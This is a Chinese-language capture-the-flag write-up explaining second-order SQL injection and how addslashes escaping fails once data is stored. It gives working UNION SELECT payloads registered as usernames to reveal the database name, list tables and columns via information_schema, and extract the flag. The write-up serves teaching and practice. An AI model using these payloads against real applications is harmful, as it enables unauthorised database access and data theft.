October 2019 Twice SQL Injection

October 2019 Twice SQL Injection

题目提示我们是二次注入（SQL注入（二次注入） - 知乎），二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。

二次注入的原理：

在第一次进行数据库插入数据的时候，仅仅只是使用了addslashes或者是借助get_magic_quotes_gpc对其中的特殊字符进行了转义，但是addslashes有一个特点就是虽然参数在过滤后会添加"\"进行转义，但是"\"并不会插入到数据库中，再写入数据库的时候还是保留了原来的数据。

在将数据存入到了数据库中之后，开发者就认为数据是可信的。在下一次进行需要进行查询的时候直接从数据库中取除了“脏”数据，并没有进行进一步的检验和处理，这样就会造成SQL的二次注入。比如在第一次插入数据的时候，数据中有单引号，直接插入到了数据库中；然后再下一次使用中在拼凑的过程中就形成了二次注入。

随意注册一个账户然后登录，输入sql语句，发现服务器将我们的单引号用\转义，并没有过滤关键字

这时我们需要注册恶意用户名来登录获得我们想知道的内容

注册用户名为1' union select database() #，密码为a的用户

返回到登录页面输入刚才注册的用户名（1' union select database() #）和密码（a）

登录发现爆出了数据库ctftraining

使用同样的方法来爆表：用户名：1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #，密码：a，注册登录

得到flag，news，users三个表

查一下flag表的字段：用户名：1' union select group_concat(column_name) from information_schema.columns where table_name='flag' #，密码：a，同样的注册登录

得到flag字段

查看一下flag字段的内容：用户名：1' union select flag from flag #，密码：a

得到flag

至此结束，撒花